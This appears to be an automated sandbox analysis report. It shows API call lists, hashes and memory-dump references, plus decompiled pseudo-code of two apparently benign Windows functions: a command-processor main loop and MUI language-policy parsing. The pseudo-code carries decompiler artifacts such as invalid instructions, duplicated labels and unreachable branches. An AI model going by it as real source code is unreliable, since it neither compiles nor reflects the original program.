                                0x4a5698d5
                                0x4a5698c9
                                0x00000000
                                0x4a5698c9
                                0x00000000
                                0x4a55992c

                                APIs
                                • FormatMessageW.KERNEL32(00001A00,00000000,0000013D,00000000,4A584640,00002000,00000000,00000000,766F14B9,00000000), ref: 4A5598EC
                                  • Part of subcall function 4A5518EB: wcschr.MSVCRT ref: 4A551900
                                • FormatMessageW.KERNEL32(00001800,00000000,0000013D,00000000,4A584640,00002000,?,4A584640,00000025), ref: 4A559943
                                • _ultoa.MSVCRT ref: 4A569840
                                • GetACP.KERNEL32(?,000000FF,?,00000020), ref: 4A569855
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000), ref: 4A56986A
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                • String ID: @FXJ$Application$System
                                • API String ID: 3538039442-1388544594
                                • Opcode ID: 17c754971ecf849653ea405b93632a0230debe698582a6f6526343155dd85684
                                • Instruction ID: 650dd0e18cfc598ea624312f4605db2921230fdebba222ea8375aa4459905625
                                • Opcode Fuzzy Hash: 17c754971ecf849653ea405b93632a0230debe698582a6f6526343155dd85684
                                • Instruction Fuzzy Hash: D5417BB1A41209FFEB10AEA1CE48FAE7ABCFF45755F210426F50AEB194D6709D40CB21
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A5572E9, Relevance: 19.7, APIs: 13, Instructions: 220threadmemoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 45%
                                			E4A5572E9(void* __edi, void* __esi, int _a4) {
				signed int _v16;
				void* _v17;
				int _v20;
				int _v24;
				int _v28;
				char _v32;
				void* _v36;
				char _v48;
				void* _v120;
				void* __ebp;
				void* _t40;
				intOrPtr _t44;
				int _t49;
				intOrPtr* _t53;
				signed int _t55;
				intOrPtr _t56;
				int _t59;
				int _t64;
				intOrPtr _t67;
				signed int _t71;
				signed int _t72;
				intOrPtr _t79;
				intOrPtr _t80;
				char* _t83;
				signed int _t86;
				int _t88;
				void* _t90;
				intOrPtr _t92;
				void* _t94;
				void* _t98;
				intOrPtr _t101;
				char* _t105;
				void* _t108;
				signed int _t109;
				int _t112;
				void* _t113;
				signed int* _t114;
				void* _t116;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;
				void* _t122;
				signed int _t131;

				do {
				} while (E4A55727F(_t122, 0) == 0);
				exit(_a4);
				asm("int3");
				_t117 = _t120;
				_t121 = _t120 - 0x28;
				_v28 = 0;
				_t40 = OpenThread(0x1fffff, 0, GetCurrentThreadId());
				 *0x4a57418c = _t40;
				E4A551690();
				__imp__HeapSetInformation(0, 1, 0, 0, 0, __edi, __esi, _t90, _t116);
				E4A557B0D(_t94,  &_v32);
				_t44 = _t117 - 1;
				_push(0x4a574210);
				_push(_t44);
				 *0x4a574086 = 1;
				 *0x4a5741d8 = _t44;
				if(E4A557D20() == 1) {
					 *0x4a574086 = 0;
				}
				E4A557BDB();
				_t105 =  &_v48;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = 0;
				_t49 = E4A5584E3( &_v48, 4);
				_t112 = _t49;
				if(_v28 == 1) {
					_push(0);
					_push(0x40002729);
					E4A5599E1(_t94);
					_push(0);
					E4A56BE8D();
					_push(0xff);
					_t49 = E4A5572E9(_t105, _t112);
				}
				_t113 = GetCPInfo;
				if(_t112 != 0) {
					_push(0);
					_push(0x4a574b40);
					L4A551BC7();
					if(_t49 != 0) {
						_v24 = 1;
						__eflags =  *0x4a5740e4; // 0x0
						if(__eflags != 0) {
							_v20 = 0xff;
						}
					}
					if(_v24 == 0) {
						_v16 = 0;
						do {
							_t82 =  *((intOrPtr*)(_t117 + _v16 * 4 - 0x28));
							if( *((intOrPtr*)(_t117 + _v16 * 4 - 0x28)) != 0) {
								_t83 = E4A551BD2(_t105, __eflags, 1, _t82,  *0x4a574104);
								_t105 = _t83;
								__eflags = _t105 - 1;
								if(_t105 == 1) {
									_push(_t83);
									E4A5572E9(_t105, _t113);
								}
								__eflags = _t105 - 0xffffffff;
								if(_t105 == 0xffffffff) {
									_push(0);
									E4A5572E9(_t105, _t113);
								}
								_t86 = E4A551492(0, _t105);
								__eflags = _t86;
								if(__eflags != 0) {
									_v20 = _t86;
								}
							}
							_v16 = _v16 + 1;
						} while (_v16 < 3);
						E4A551605();
						_t88 = GetConsoleOutputCP();
						 *0x4a5741b8 = _t88;
						GetCPInfo(_t88, 0x4a574260);
						_push(0);
						_t49 = E4A551690();
					}
					_t131 =  *0x4a5740e4; // 0x0
					if(_t131 != 0) {
						_push(_v20);
						_t49 = E4A5572E9(_t105, _t113);
					}
					 *0x4a5740e0 = 0;
				}
				_push(0);
				L4A551BC7();
				_t98 = 0x4a574b40;
				_v20 = _t49;
				if(_t49 == 0) {
					L16:
					if(_v28 == 2) {
						_push(0);
						E4A5599E1(_t98);
						_t98 = 0x40002729;
						_push(0);
						_t53 = E4A56BE8D();
						_push(0xff);
						L47:
						 *_t53 =  *_t53 + _t53;
						_t49 = _t53 + _t98 + 1;
						asm("cld");
						asm("invalid");
					}
					_t55 = E4A553B03(_t49, _t98, 0);
					asm("sbb edi, edi");
					_t108 =  ~_t55 + 3;
					_t134 = _t108 - 3;
					if(_t108 == 3) {
						__imp___setmode(0, 0x8000);
						_pop(_t98);
					}
					_t56 = E4A55C2F7(_t98, 0);
					while(1) {
						L19:
						 *0x4a5740b8 = 0;
						E4A551E6C(_t56);
						_t56 = E4A551BD2(_t108, _t134, _t108, 0, 0);
						_v32 = _t56;
						if(_t56 == 1) {
							continue;
						}
						L49:
						if(_t56 != 0xffffffff) {
							E4A551E6C(_t56);
							_t59 = GetConsoleOutputCP();
							 *0x4a5741b8 = _t59;
							GetCPInfo(_t59, 0x4a574260);
							_push(0);
							E4A551690();
							E4A551492(0, _v32);
							 *0x4a574083 = 0;
							E4A551605();
							_t64 = GetConsoleOutputCP();
							 *0x4a5741b8 = _t64;
							GetCPInfo(_t64, 0x4a574260);
							_push(0);
							_t56 = E4A551690();
							do {
								goto L19;
							} while (_t56 == 1);
							goto L49;
						}
						_push(0);
						_t53 = E4A5572E9(_t108, _t113);
						goto L47;
						L19:
						 *0x4a5740b8 = 0;
						E4A551E6C(_t56);
						_t56 = E4A551BD2(_t108, _t134, _t108, 0, 0);
						_v32 = _t56;
					}
				}
				__eflags = _t49 - 2;
				if(_t49 != 2) {
					goto L16;
				}
				E4A5572E9(_t105, _t113);
				asm("int3");
				_t118 = _t121;
				L28();
				__imp__longjmp(0x4a574b40,  *((intOrPtr*)(_t118 + 8)), _t117, 0);
				asm("int3");
				_push(_t118);
				_push(_t98);
				_push(0);
				_t92 = 0;
				 *0x4a574120 = 0;
				__eflags =  *0x4a5740b4 - _t92; // 0x0
				if(__eflags != 0) {
					_push(0);
					L4A556BA1();
					_t67 =  *0x4a5741e0; // 0x0
					_push(0);
					 *0x4a57408c = _t67;
					 *0x4a5740b8 = 0;
					E4A55DA73();
					 *0x4a5740b4 = 0;
				}
				__eflags =  *0x4a5740cc - _t92; // 0x0
				if(__eflags == 0) {
					_t79 =  *0x4a5740bc; // 0x0
					 *0x4a5740c4 = _t79;
					_t80 =  *0x4a5740c0; // 0x0
					 *0x4a5740c8 = _t80;
					 *0x4a5740cc = 1;
				}
				 *0x4a5740bc = _t92;
				 *0x4a5740c0 = _t92;
				while(1) {
					__eflags =  *0x4a5740fc - _t92; // 0x0
					if(__eflags == 0) {
						break;
					}
					E4A554738();
				}
				_push(_t113);
				_push(_t105);
				E4A56383B(_t98);
				_t109 = 0;
				__eflags = 0;
				do {
					_t114 = 0x4a57487c + _t109 * 4;
					__eflags =  *_t114 - _t92;
					if( *_t114 != _t92) {
						_v20 = 1;
						do {
							_t71 = _v20;
							__eflags =  *_t114 & _t71;
							if(( *_t114 & _t71) != 0) {
								__eflags = _t109;
								if(_t109 != 0) {
									L58:
									__eflags = (_t109 << 5) + _t92;
									E4A553AB3((_t109 << 5) + _t92);
								} else {
									__eflags = _t92 - 2;
									if(_t92 > 2) {
										goto L58;
									}
								}
							}
							_v20 = _v20 << 1;
							_t92 = _t92 + 1;
							__eflags = _t92 - 0x20;
						} while (_t92 < 0x20);
						_t92 = 0;
					}
					_t109 = _t109 + 1;
					__eflags = _t109 - 3;
				} while (_t109 < 3);
				while(1) {
					_t72 =  *0x4a574134; // 0x0
					__eflags = _t72 - _t92;
					if(_t72 == _t92) {
						break;
					}
					_t101 =  *0x4a57412c; // 0x0
					E4A552F5C( *((intOrPtr*)(_t101 + _t72 * 4 - 4)));
				}
				return E4A551605();
			}















































                                0x4a5572ee
                                0x4a5572f5
                                0x4a5572fc
                                0x4a557302
                                0x4a55730b
                                0x4a55730d
                                0x4a557315
                                0x4a557325
                                0x4a55732c
                                0x4a557331
                                0x4a55733b
                                0x4a557345
                                0x4a55734a
                                0x4a55734d
                                0x4a557352
                                0x4a557353
                                0x4a55735a
                                0x4a557367
                                0x4a56762a
                                0x4a56762a
                                0x4a55736d
                                0x4a557374
                                0x4a557377
                                0x4a557378
                                0x4a557379
                                0x4a55737a
                                0x4a557381
                                0x4a557384
                                0x4a55738d
                                0x4a55738f
                                0x4a567635
                                0x4a567636
                                0x4a56763b
                                0x4a567642
                                0x4a567643
                                0x4a567648
                                0x4a56764d
                                0x4a56764d
                                0x4a557397
                                0x4a55739d
                                0x4a55739f
                                0x4a5573a0
                                0x4a5573a5
                                0x4a5573ae
                                0x4a567657
                                0x4a56765e
                                0x4a567664
                                0x4a56766a
                                0x4a56766a
                                0x4a567664
                                0x4a5573b7
                                0x4a5573b9
                                0x4a5573bc
                                0x4a5573bf
                                0x4a5573c5
                                0x4a557469
                                0x4a55746e
                                0x4a557470
                                0x4a557473
                                0x4a567676
                                0x4a567677
                                0x4a567677
                                0x4a557479
                                0x4a55747c
                                0x4a567681
                                0x4a567682
                                0x4a567682
                                0x4a557484
                                0x4a557489
                                0x4a55748b
                                0x4a557491
                                0x4a557491
                                0x4a55748b
                                0x4a5573cb
                                0x4a5573ce
                                0x4a5573d4
                                0x4a5573d9
                                0x4a5573e5
                                0x4a5573ea
                                0x4a5573ec
                                0x4a5573ed
                                0x4a5573ed
                                0x4a5573f2
                                0x4a5573f8
                                0x4a5573fa
                                0x4a5573fd
                                0x4a5573fd
                                0x4a557402
                                0x4a557402
                                0x4a557408
                                0x4a55740e
                                0x4a557414
                                0x4a557415
                                0x4a55741a
                                0x4a557420
                                0x4a557424
                                0x4a56768c
                                0x4a567692
                                0x4a567698
                                0x4a567699
                                0x4a56769a
                                0x4a56769f
                                0x4a5676a1
                                0x4a5676a1
                                0x4a5676a5
                                0x4a5676a6
                                0x4a5676a7
                                0x4a5676a7
                                0x4a55742b
                                0x4a557434
                                0x4a557436
                                0x4a557439
                                0x4a55743c
                                0x4a563621
                                0x4a563628
                                0x4a563628
                                0x4a557443
                                0x4a557448
                                0x4a557448
                                0x4a557448
                                0x4a55744e
                                0x4a557456
                                0x4a5676ae
                                0x4a5676b4
                                0x00000000
                                0x00000000
                                0x4a5676ba
                                0x4a5676bd
                                0x4a5676c9
                                0x4a5676ce
                                0x4a5676da
                                0x4a5676df
                                0x4a5676e1
                                0x4a5676e2
                                0x4a5676eb
                                0x4a5676f0
                                0x4a5676f6
                                0x4a5676fb
                                0x4a567707
                                0x4a56770c
                                0x4a56770e
                                0x4a56770f
                                0x4a557448
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a557448
                                0x4a5676bf
                                0x4a5676c0
                                0x00000000
                                0x4a557448
                                0x4a557448
                                0x4a55744e
                                0x4a557456
                                0x4a5676ae
                                0x4a5676b1
                                0x4a557448
                                0x4a563772
                                0x4a563775
                                0x00000000
                                0x00000000
                                0x4a56377c
                                0x4a563781
                                0x4a56378a
                                0x4a56378c
                                0x4a563799
                                0x4a56379f
                                0x4a5637a7
                                0x4a5637aa
                                0x4a5637ab
                                0x4a5637ac
                                0x4a5637ae
                                0x4a5637b4
                                0x4a5637ba
                                0x4a569547
                                0x4a569548
                                0x4a56954d
                                0x4a569552
                                0x4a569553
                                0x4a569558
                                0x4a56955e
                                0x4a569563
                                0x4a569563
                                0x4a5637c0
                                0x4a5637c6
                                0x4a5637c8
                                0x4a5637cd
                                0x4a5637d2
                                0x4a5637d7
                                0x4a5637dc
                                0x4a5637dc
                                0x4a5637e6
                                0x4a5637ec
                                0x4a5637f2
                                0x4a5637f2
                                0x4a5637f8
                                0x00000000
                                0x00000000
                                0x4a56382f
                                0x4a56382f
                                0x4a5637fa
                                0x4a5637fb
                                0x4a5637fc
                                0x4a563801
                                0x4a563801
                                0x4a563803
                                0x4a563803
                                0x4a56380a
                                0x4a56380c
                                0x4a56956e
                                0x4a569575
                                0x4a569575
                                0x4a569578
                                0x4a56957a
                                0x4a56957c
                                0x4a56957e
                                0x4a569585
                                0x4a56958a
                                0x4a56958d
                                0x4a569580
                                0x4a569580
                                0x4a569583
                                0x00000000
                                0x00000000
                                0x4a569583
                                0x4a56957e
                                0x4a569592
                                0x4a569595
                                0x4a569596
                                0x4a569596
                                0x4a56959b
                                0x4a56959b
                                0x4a563812
                                0x4a563813
                                0x4a563813
                                0x4a56381a
                                0x4a56381a
                                0x4a56381f
                                0x4a563821
                                0x00000000
                                0x00000000
                                0x4a5695a2
                                0x4a5695ac
                                0x4a5695ac
                                0x4a56382e

                                APIs
                                • exit.MSVCRT ref: 4A5572FC
                                • GetCurrentThreadId.KERNEL32(4A574204,00000001,00000000), ref: 4A557318
                                • OpenThread.KERNEL32(001FFFFF,00000000,00000000), ref: 4A557325
                                • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 4A55733B
                                • _setjmp3.MSVCRT ref: 4A5573A5
                                • GetConsoleOutputCP.KERNEL32 ref: 4A5573D9
                                • GetCPInfo.KERNEL32(00000000,4A574260), ref: 4A5573EA
                                • _setjmp3.MSVCRT ref: 4A55740E
                                  • Part of subcall function 4A553B03: _get_osfhandle.MSVCRT ref: 4A553B0D
                                  • Part of subcall function 4A553B03: GetFileType.KERNEL32 ref: 4A553B17
                                • _setmode.MSVCRT ref: 4A563621
                                  • Part of subcall function 4A55C2F7: SetConsoleTitleW.KERNEL32(?), ref: 4A55C3E1
                                  • Part of subcall function 4A55C2F7: LocalFree.KERNEL32(?,00000000,00000000,?,-00000003,766F5129,00000000), ref: 4A55C420
                                  • Part of subcall function 4A551E6C: EnterCriticalSection.KERNEL32(4A55851C), ref: 4A551E72
                                  • Part of subcall function 4A551E6C: LeaveCriticalSection.KERNEL32(?,4A551DBC,?,00000021,-00000003,4A588640,4A574210,00000000,00000000,?,4A551CE6,4A588640,4A574210,4A574210,?,4A551C8D), ref: 4A551E85
                                  • Part of subcall function 4A551BD2: _setjmp3.MSVCRT ref: 4A551BFB
                                • GetConsoleOutputCP.KERNEL32 ref: 4A5676CE
                                • GetCPInfo.KERNEL32(00000000,4A574260), ref: 4A5676DF
                                • GetConsoleOutputCP.KERNEL32 ref: 4A5676FB
                                • GetCPInfo.KERNEL32(00000000,4A574260), ref: 4A56770C
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Console$InfoOutput_setjmp3$CriticalSectionThread$CurrentEnterFileFreeHeapInformationLeaveLocalOpenTitleType_get_osfhandle_setmodeexit
                                • String ID:
                                • API String ID: 2992786541-0
                                • Opcode ID: f548c08b10fcf65467962f13ed493f6c7a51cab3989b38ef8e9b14cee8cc9f5a
                                • Instruction ID: cef6deb7dcdfce08f8c29412c7463fafa0d2278dfe68e8786eb93f2fbd13a2df
                                • Opcode Fuzzy Hash: f548c08b10fcf65467962f13ed493f6c7a51cab3989b38ef8e9b14cee8cc9f5a
                                • Instruction Fuzzy Hash: 6A5192F580520AFADB11BBB4CF8496E3E7CAF85328F110D1BF515EA55EDB345840872A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                Download Yara Rule
                                C-Code - Quality: 94%
                                			E022B8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E022B8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0229E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E022B718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E022B8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0229E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E022B718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E022B8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E022B8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E022B8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0229E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0229E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E022B718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0229E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E02292340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E022AE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0229E2A8(_t322,  &_v68, _v16);
								if(E022B5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E022AE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0229E2A8(_t322,  &_v68, _t236);
								if(E022B5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0229E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0229E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E022B718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0229E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E02292340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E022AE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0229E2A8(_v12,  &_v68, _v16);
							if(E022B5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E022AE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0229E2A8(_t322,  &_v68, _t269);
							if(E022B5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0229E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0229E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E022B718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0229E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E02292340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E022AE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0229E2A8(_v12,  &_v68, _v16);
						if(E022B5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E022AE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0229E2A8(_t322,  &_v68, _t296);
						if(E022B5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0229E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0229E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                0x022b8788
                                0x022b8788
                                0x022b8791
                                0x022b8794
                                0x022b8798
                                0x022b879b
                                0x022b879e
                                0x022b87a1
                                0x022b87a4
                                0x022b87a7
                                0x022b87aa
                                0x022b87af
                                0x02301ad3
                                0x022b8b0a
                                0x022b8b0d
                                0x022b8b13
                                0x022b8b19
                                0x022b8b1f
                                0x022b8b25
                                0x022b8b2b
                                0x022b8b31
                                0x022b8b37
                                0x022b8b3d
                                0x022b8b46
                                0x022b8b46
                                0x022b87c6
                                0x022b87d0
                                0x02301ae0
                                0x02301ae6
                                0x02301af8
                                0x02301af8
                                0x02301afd
                                0x02301afe
                                0x02301b01
                                0x02301b06
                                0x02301b06
                                0x022b87d6
                                0x022b87f2
                                0x022b87f7
                                0x022b8807
                                0x022b880a
                                0x022b880f
                                0x022b8810
                                0x022b8813
                                0x022b8818
                                0x022b8818
                                0x022b882c
                                0x022b8831
                                0x022b8838
                                0x022b8908
                                0x022b8920
                                0x022b89f0
                                0x022b8a08
                                0x022b8af6
                                0x022b8af6
                                0x022b8af8
                                0x022b8afb
                                0x02301beb
                                0x02301beb
                                0x022b8b04
                                0x02301bf8
                                0x02301c0e
                                0x02301c13
                                0x02301c16
                                0x02301c16
                                0x02301bf8
                                0x00000000
                                0x022b8b04
                                0x022b8a0e
                                0x022b8a11
                                0x022b8a14
                                0x022b8a15
                                0x022b8a18
                                0x022b8a22
                                0x022b8b59
                                0x022b8a28
                                0x022b8a3c
                                0x022b8a3c
                                0x022b8a42
                                0x02301bb0
                                0x02301b11
                                0x02301b11
                                0x00000000
                                0x022b8a48
                                0x022b8a51
                                0x022b8a5b
                                0x022b8a5e
                                0x022b8a61
                                0x022b8a69
                                0x022b8a69
                                0x022b8a6d
                                0x00000000
                                0x00000000
                                0x022b8a74
                                0x022b8a7c
                                0x022b8a7d
                                0x022b8a91
                                0x022b8a93
                                0x022b8a93
                                0x022b8a98
                                0x022b8a9b
                                0x022b8aa1
                                0x022b8aa1
                                0x022b8aa4
                                0x022b8aaa
                                0x022b8ab1
                                0x022b8ac5
                                0x022b8ac7
                                0x022b8ac7
                                0x022b8ac5
                                0x022b8ace
                                0x02301bc9
                                0x02301bce
                                0x02301bd2
                                0x02301bd2
                                0x022b8ad8
                                0x022b8aeb
                                0x022b8aeb
                                0x022b8af0
                                0x022b8af4
                                0x00000000
                                0x022b8af4
                                0x022b8a42
                                0x022b8926
                                0x022b8929
                                0x022b892c
                                0x022b892d
                                0x022b8930
                                0x022b8935
                                0x022b893a
                                0x022b8b51
                                0x022b8940
                                0x022b8954
                                0x022b8954
                                0x022b895a
                                0x02301b63
                                0x00000000
                                0x022b8960
                                0x022b8969
                                0x022b8973
                                0x022b8976
                                0x022b8979
                                0x022b897e
                                0x022b8981
                                0x022b8981
                                0x022b8986
                                0x00000000
                                0x00000000
                                0x02301b6e
                                0x02301b74
                                0x02301b7b
                                0x02301b8f
                                0x02301b91
                                0x02301b91
                                0x02301b99
                                0x02301b9c
                                0x02301ba2
                                0x02301ba2
                                0x022b898c
                                0x022b8992
                                0x022b8999
                                0x022b89ad
                                0x02301ba8
                                0x02301ba8
                                0x022b89ad
                                0x022b89b6
                                0x022b89c8
                                0x022b89cd
                                0x022b89d0
                                0x022b89d0
                                0x022b89d6
                                0x022b89e8
                                0x022b89e8
                                0x022b89ed
                                0x00000000
                                0x022b89ed
                                0x022b895a
                                0x022b883e
                                0x022b8841
                                0x022b8844
                                0x022b8845
                                0x022b8848
                                0x022b884d
                                0x022b8852
                                0x022b8b49
                                0x022b8858
                                0x022b886c
                                0x022b886c
                                0x022b8872
                                0x02301b0e
                                0x00000000
                                0x022b8878
                                0x022b8881
                                0x022b888b
                                0x022b888e
                                0x022b8891
                                0x022b8896
                                0x022b8899
                                0x022b8899
                                0x022b889e
                                0x00000000
                                0x00000000
                                0x02301b21
                                0x02301b27
                                0x02301b2e
                                0x02301b42
                                0x02301b44
                                0x02301b44
                                0x02301b4c
                                0x02301b4f
                                0x02301b55
                                0x02301b55
                                0x022b88a4
                                0x022b88aa
                                0x022b88b1
                                0x022b88c5
                                0x02301b5b
                                0x02301b5b
                                0x022b88c5
                                0x022b88ce
                                0x022b88e0
                                0x022b88e5
                                0x022b88e8
                                0x022b88e8
                                0x022b88ee
                                0x022b8900
                                0x022b8900
                                0x022b8905
                                0x00000000
                                0x022b8905

                                APIs
                                Strings
                                • WindowsExcludedProcs, xrefs: 022B87C1
                                • Kernel-MUI-Number-Allowed, xrefs: 022B87E6
                                • Kernel-MUI-Language-SKU, xrefs: 022B89FC
                                • Kernel-MUI-Language-Disallowed, xrefs: 022B8914
                                • Kernel-MUI-Language-Allowed, xrefs: 022B8827
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _wcspbrk
                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
